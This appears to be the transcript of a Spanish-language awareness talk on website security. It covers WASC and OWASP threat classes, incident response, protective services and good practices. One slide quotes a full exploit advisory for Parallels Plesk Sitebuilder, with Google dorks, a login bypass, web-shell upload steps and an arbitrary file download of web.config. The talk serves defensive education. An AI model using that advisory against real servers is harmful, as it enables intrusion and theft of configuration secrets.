Jornada Seguridad WEB Garaia Enpresa Digitala

91
¿Puede mi sitio web sufrir un ataque? ¿Qué puedo hacer?

description

Jornada sobre seguridad WEB para Garaia Enpresa Digitala. ¿Puede mi sitio web sufrir un ataque?¿Que puedo hacer?

Transcript of Jornada Seguridad WEB Garaia Enpresa Digitala

Page 1: Jornada Seguridad WEB Garaia Enpresa Digitala

¿Puede mi sitio web sufrir un ataque? ¿Qué puedo hacer?

Page 2: Jornada Seguridad WEB Garaia Enpresa Digitala

NOTA: Durante los próximos minutos voy a ser algo parecido a la chica de la curva

Page 3: Jornada Seguridad WEB Garaia Enpresa Digitala

AGENDA

1\\ Presentación2\\ Introducción a la seguridad WEB y ataques existentes3\\ Consecuencias. Ejemplos prácticos4\\ He sido atacado. ¿Ahora que hago?5\\ Herramientas y servicios con los que protegernos6\\ Algunos consejos útiles7\\ ¿Hablamos?

Page 4: Jornada Seguridad WEB Garaia Enpresa Digitala

¿Puede mi sitio web sufrir un ataque?

La respuesta es obvia:

Page 5: Jornada Seguridad WEB Garaia Enpresa Digitala

¿Qué puedo hacer?

Page 6: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Clasificación de amenazas WEB

Abuso de la funcionalidad: el abuso de funcionalidad es una técnica de ataque que utiliza las propias características y funciones de un sitio web para consumir, defraudar o eludir los mecanismos de control de acceso. Fuerza bruta: una ataque de fuerza bruta es un proceso automatizado de prueba y error que se utiliza para adivinar el nombre de usuario, la contraseña, el número de tarjeta de crédito o la clave criptográfica de una persona. Desbordamiento de almacenamiento intermedio: los exploits de desbordamiento de almacenamiento intermedio son ataques que alteran el flujo de una aplicación sobrescribiendo partes de la memoria. Usurpación de contenido: la usurpación de contenido es una técnica de ataque que se utiliza para hacer creer a un usuario que determinado contenido que aparece en un sitio web es legítimo y no procede de un origen externo.

http://projects.webappsec.org/f/WASC-TC-v2_0.pdf

Page 7: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Clasificación de amenazas WEB

Predicción de sesión/credenciales: la predicción de sesión/credenciales es un método de apropiación de identidad o suplantación de un usuario de sitio web. Deducir o adivinar el valor único que identifica la sesión o el usuario concreto que efectúa el ataque. Script entre sitios: el script entre sitios (XSS) es una técnica de ataque que obliga a un sitio web a duplicar el código ejecutable proporcionado por el atacante, que se carga en el navegador de un usuario. Un usuario de un script entre sitios puede verse expropiado de su cuenta (robo de cookies), su navegador puede ser redirigido a otra ubicación, o se le puede mostrar contenido fraudulento en el sitio web que esté visitando. Denegación de servicio: la denegación de servicio (DoS) es una técnica de ataque cuyo objetivo es impedir que un sitio web ofrezca una actividad normal a los usuarios.

http://projects.webappsec.org/f/WASC-TC-v2_0.pdf

Page 8: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Clasificación de amenazas WEB

Indexación de directorios: el listado/indexación automática de directorios es una función de servidor que lista todos los archivos en un directorio solicitado si el archivo básico normal (index.html/home.html/default.htm) no está presente. Ataque de serie de formato: los ataques de serie de formato alteran el flujo de una aplicación utilizando características de la biblioteca de formatos de series para acceder a otro espacio de la memoria.Filtrado de información: el filtraje de información se produce cuando un sitio web revela datos confidenciales, por ejemplo comentarios de un desarrollador o mensajes de error, que pueden ayudar a un atacante a aprovecharse del sistema. Anti automatización insuficiente: la anti automatización insuficiente se produce cuando un sitio web permite a un atacante automatizar un proceso que sólo debe realizarse manualmente.

http://projects.webappsec.org/f/WASC-TC-v2_0.pdf

Page 9: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Clasificación de amenazas WEB

Autenticación insuficiente: la autenticación insuficiente se produce cuando un sitio web permite a un atacante acceder a contenido o funciones confidenciales sin autenticar correctamente sus permisos de acceso. Autorización insuficiente: la autorización insuficiente se produce cuando un sitio web permite el acceso a contenido o funciones confidenciales que deben requerir un incremento de las restricciones de control de acceso. Validación de proceso insuficiente: la validación de proceso insuficiente se produce cuando un sitio web permite a un atacante eludir el control de flujo previsto de una aplicación. Caducidad de sesión insuficiente: la caducidad de sesión insuficiente se produce cuando un sitio web permite a un atacante reutilizar credenciales de sesión o ID de sesión antiguos para llevar a cabo la autorización. La caducidad de sesión insuficiente aumenta la exposición de un sitio web a los ataques que roban o suplantan a otros usuarios.

http://projects.webappsec.org/f/WASC-TC-v2_0.pdf

Page 10: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Clasificación de amenazas WEB

Inyección LDAP: la inyección LDAP es una técnica de ataque utilizada para aprovecharse de los sitios web que crean sentencias LDAP (Lightweight Directory Access Protocol) a partir de entradas proporcionadas por los usuarios. Envío de mandatos del SO: el envío de mandatos del SO es una técnica de ataque utilizada para aprovecharse de los sitios web mediante la ejecución de mandatos del sistema operativo a través de la manipulación de la entrada de la aplicación. Cruce de vía de acceso: la técnica de ataque de cruce de vía de acceso fuerza el acceso a archivos, directorios y mandatos que pueden estar ubicados potencialmente fuera del directorio raíz de documentos. Un atacante podría manipular un URL de forma que el sitio web ejecutará o revelará el contenido de archivos arbitrarios en cualquier parte del servidor web.

http://projects.webappsec.org/f/WASC-TC-v2_0.pdf

Page 11: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Clasificación de amenazas WEB

Ubicación de recursos predecible: la ubicación de recursos predecible es una técnica de ataque utilizada para descubrir contenido y funciones ocultas de un sitio web. El ataque, que se vale de considerar la información de la que dispone, es una búsqueda de fuerza bruta en busca de contenido que no está pensado para mostrarse públicamente. Archivos temporales, archivos de copia de seguridad, archivos de configuración y archivos de ejemplo son todos ejemplos de archivos potencialmente sobrantes. Fijación de sesión: la fijación de sesión es una técnica de ataque que fuerza un ID de sesión de usuario a un valor explícito. Inyección SQL: la inyección SQL es una técnica de ataque utilizada para aprovecharse de los sitios web que crean sentencias SQL a partir de entradas proporcionadas por los usuarios. Inyección SSI: la inyección SSI (inclusión del lado del servidor) es una técnica de aprovechamiento del lado del servidor que permite a un atacante enviar código en una aplicación, que posteriormente el servidor web ejecutará localmente.

http://projects.webappsec.org/f/WASC-TC-v2_0.pdf

Page 12: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Clasificación de amenazas WEB

Validación de recuperación de contraseña débil: la validación de recuperación de contraseña débil se produce cuando un sitio web permite a un atacante obtener, cambiar o recuperar ilegalmente la contraseña de otro usuario. Inyección XPath: la inyección XPath es una técnica de ataque utilizada para aprovecharse de los sitios web que crean consultas XPath a partir de entradas proporcionadas por los usuarios.

http://projects.webappsec.org/f/WASC-TC-v2_0.pdf

Page 13: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

=€!

Consecuencias derivadas de los ataques

Page 14: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Panorama…

Page 15: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Panorama…

Crouching Yeti / Energetic Bear (Verano 2014)

Page 16: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Panorama…

Page 17: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Page 18: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Page 19: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

http://www.ddossite.com/

http://youtu.be/vn-lU3Zu3dw

http://youtu.be/aCacibJa0Ps

Page 20: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

http://www.digitalattackmap.com

Page 21: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Page 22: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Page 23: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Page 24: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Page 25: Jornada Seguridad WEB Garaia Enpresa Digitala

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++# Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder# Author : alieye# vendor : http://www.parallels.com/# Contact : [email protected]# Risk : High# Class: Remote## Google Dork: # inurl::2006/Sites ext:aspx# inurl::2006 inurl:.ashx?mediaid# intext:"© Copyright 2004-2007 SWsoft." ext:aspx# inurl:Wizard/HostingPreview.aspx?SiteID## Date: 23/07/2014# os : windows server 2003# poc video clip : http://alieye.persiangig.com/video/plesk.rar/download## version : for uploading shell (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2010 # version : for other bug (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2014 #++++++++++++++++++++++++++++++++++++++++++++++++++++++++1-bypass loginpage (all version)http://victim.com:2006/login.aspxchange url path to http://victim.com:2006/wizard2-uploading shell via Live HTTP Headers(Copyright 2004-2010)Tools Needed: Live HTTP Headers, Backdoor ShellStep 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspxStep 2: Rename your shell to shell.asp.gif and start capturing data withLive HTTP HeadersStep 3: Replay data with Live HTTP Headers -Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"\r\n] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"\r\n]Step 5: go to shell path:http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp3-Arbitrary File Download Vulnerability(all version)You can download any file from your targethttp://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filenameexample: http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config4-xss(all version)you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspxgoto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy :)5-not authentication for making a website(all version)making malicious page and phishing page with these paths http://victim.com:2006/Wizard/Pages.aspxhttp://victim.com:2006/Wizard/Edit.aspx#++++++++++++++++++++++++++++++++++++++++++++++++++++++++[#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir[#] Thanks To All cseye members and All Iranian Hackers[#] website : http://cseye.vcp.ir/#++++++++++++++++++++++++++++++++++++++++++++++++++++++++[#] Spt Tnx To Master of Persian Music: Hossein Alizadeh[#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/[#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Page 26: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Page 27: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

Page 28: Jornada Seguridad WEB Garaia Enpresa Digitala

Introducción a los ataques existentes

El objetivo principal del TOP 10 OWASP es dar a conocer a los desarrolladores, diseñadores, arquitectos, gerentes, y organizaciones sobre las consecuencias de las vulnerabilidades de seguridad más importantes en aplicaciones web.El TOP 10 provee de técnicas básicas sobre como protegerse en estas áreas de alto riesgo y también provee orientación sobre los pasos a seguir.

Que se hable de top 10 no significa que no existan más vulnerabilidades!!Simplemente son las más comunes.

Page 29: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 30: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 31: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 32: Jornada Seguridad WEB Garaia Enpresa Digitala

http://youtu.be/dGLM_xjZZms

Para muestra… un botón:

Page 33: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 34: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 35: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 36: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 37: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 38: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 39: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 40: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 41: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 42: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 43: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 44: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 45: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 46: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 47: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 48: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 49: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 50: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 51: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 52: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 53: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 54: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 55: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 56: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 57: Jornada Seguridad WEB Garaia Enpresa Digitala

http://youtu.be/UtU1gGv9xNw

Page 58: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 59: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 60: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 61: Jornada Seguridad WEB Garaia Enpresa Digitala

Evolución OWASP Top 10

Page 62: Jornada Seguridad WEB Garaia Enpresa Digitala

Consecuencias. Ejemplos prácticos

Page 63: Jornada Seguridad WEB Garaia Enpresa Digitala

Consecuencias. Ejemplos prácticos

Page 64: Jornada Seguridad WEB Garaia Enpresa Digitala

Consecuencias. Ejemplos prácticos

Page 65: Jornada Seguridad WEB Garaia Enpresa Digitala

Consecuencias. Ejemplos prácticos

Page 66: Jornada Seguridad WEB Garaia Enpresa Digitala

He sido atacado. ¿Ahora que hago?

El procedimiento varía dependiendo de múltiples variables pero podría ser algo así:

1.- Poner el sitio web atacado offline.

2.- Guardar logs, hacer backup de la base de datos y de los archivos. Aplicar FUEGO PURIFICADOR o contratar servicios de desinfección.

3.- Revisar todas las posibles extensiones vulnerables o framework e intentar determinar el punto de entrada.

4.- Reinstalar framework, plugins, plantillas, bbdd, SO, … desde un backup que se sepa que está limpio. Parchear el posible punto de entrada.

5.-Cambiar todas las contraseñas

6.- Si se ha sido intermediario de un ataque de watering hole o se cree que se han podido ver comprometidos datos de importancia, notificar a posibles usuarios afectados el incidente de seguridad.

Page 67: Jornada Seguridad WEB Garaia Enpresa Digitala

He sido atacado. ¿Ahora que hago?

Denunciar si hemos sido victimas de un ataque

>Ertzaintza: [email protected]>Guardia Civil: https://www.gdt.guardiacivil.es/webgdt/pinformar.php>Policia Nacional: http://www.policia.es/colabora.php

Contratar servicios especializados de análisis forense para que en caso de que se quiera llevar a juicio el ataque, se disponga de pruebas válidas con las que afrontar la denuncia.

Page 68: Jornada Seguridad WEB Garaia Enpresa Digitala

WAF. Web Application Firewall

Herramientas y servicios con los que protegernos

Nos protege de:>Vulnerabilidades de sistema operativo>Vulnerabilidades de aplicación \\SQLi \\XSS \\LFI \\RFI \\DT \\…

Nos tiene que quedar claro que las aplicaciones y sistemas operativos siguen siendo vulnerables. Parcheo Virtual

Page 69: Jornada Seguridad WEB Garaia Enpresa Digitala

WAF. Web Application Firewall

Herramientas y servicios con los que protegernos

De todos los colores y sabores:>Software (Open Source, Propietarios…)>Virtuales>Hardware>As a Service (En la nube)

Page 70: Jornada Seguridad WEB Garaia Enpresa Digitala

Herramientas y servicios con los que protegernos

WAF. Web Application Firewall

Page 71: Jornada Seguridad WEB Garaia Enpresa Digitala

Herramientas y servicios con los que protegernos

Sistemas Anti DDoS

Page 72: Jornada Seguridad WEB Garaia Enpresa Digitala

Herramientas y servicios con los que protegernos

Servicios de monitorización de contenidos WEB+ Desinfección +IR

Page 73: Jornada Seguridad WEB Garaia Enpresa Digitala

Herramientas y servicios con los que protegernos

Servicios de monitorización de contenidos WEB+ Desinfección +IR

Page 74: Jornada Seguridad WEB Garaia Enpresa Digitala

Herramientas y servicios con los que protegernos

Autenticación multifactor / Protección de identidades digitales

Page 75: Jornada Seguridad WEB Garaia Enpresa Digitala

Herramientas y servicios con los que protegernos

Hostings/Housings especializados

Page 76: Jornada Seguridad WEB Garaia Enpresa Digitala

Herramientas y servicios con los que protegernos

Herramientas de hardening de frameworks especificos, buenas prácticas,…

Guía básica seguridad Wordpress Intecohttp://www.inteco.es/file/WbpsPPREE7nfCgs9ZBYoAQ

Guía básica seguridad Joomla Intecohttp://www.inteco.es/file/WbpsPPREE7naXKiMJlkT_g

Page 77: Jornada Seguridad WEB Garaia Enpresa Digitala

Herramientas y servicios con los que protegernos

http://punkspider.hyperiongray.com

Page 78: Jornada Seguridad WEB Garaia Enpresa Digitala

Herramientas y servicios con los que protegernos

http://sitecheck.sucuri.net/

Page 79: Jornada Seguridad WEB Garaia Enpresa Digitala

Herramientas y servicios con los que protegernos

http://zulu.zscaler.com/

Page 80: Jornada Seguridad WEB Garaia Enpresa Digitala

Herramientas y servicios con los que protegernos

Page 81: Jornada Seguridad WEB Garaia Enpresa Digitala

Herramientas y servicios con los que protegernos

Page 82: Jornada Seguridad WEB Garaia Enpresa Digitala

Algunos consejos útiles

\\ Contar con profesionales del desarrollo web SEGURO

\\ Cuando se contrate el servicio de presencia web hablar de que ocurre en caso de que surjan vulnerabilidades, se sea victima de un ataque, tiempos de parcheo, Plan de contingencia…)

\\ Antes de poner una web online comprobar su seguridad (Revisión código, Auditoría WEB)

\\ Realizar asiduamente backups tanto de la base de datos como de la aplicación y sus ficheros asociados.

Page 83: Jornada Seguridad WEB Garaia Enpresa Digitala

\\ Preparar un Plan de Recuperación ante incidentes. Entrenarse, ponerlo a prueba.

\\ No utilizar la misma contraseña para todas las cuentas

\\ Cifrar la documentación/datos online importantes

\\ Cambia de contraseñas cada cierto tiempo

\\ Usuarios y contraseñas personales e intransferibles

\\ Tener especial cuidado cuando se manejan datos sensibles (LOPD)

Algunos consejos útiles

Page 84: Jornada Seguridad WEB Garaia Enpresa Digitala

\\ Utilizar mecanismos de autenticación de múltiples factore.

\\ Llevar un control sobre los CMS instalados y los diferentes plugins (seguros)instalados

\\ Actualizar y parchear tanto sistemas como aplicaciones

\\ Integración de sistemas Captchas para evitar herramientas automatizadas.

\\ Contratar hostings, housings con servicios de seguridad adicionales (WAF, ADDoS)

Algunos consejos útiles

Page 85: Jornada Seguridad WEB Garaia Enpresa Digitala

Algunos consejos útiles

Page 86: Jornada Seguridad WEB Garaia Enpresa Digitala

Algunos consejos útiles

Page 87: Jornada Seguridad WEB Garaia Enpresa Digitala

Algunos consejos útiles

Page 88: Jornada Seguridad WEB Garaia Enpresa Digitala

Algunos consejos útiles

Page 89: Jornada Seguridad WEB Garaia Enpresa Digitala

Algunos consejos útiles

Page 90: Jornada Seguridad WEB Garaia Enpresa Digitala
Page 91: Jornada Seguridad WEB Garaia Enpresa Digitala

7\\ ¿Hablamos?

@borjalanseros

http://es.linkedin.com/in/borjalanseros/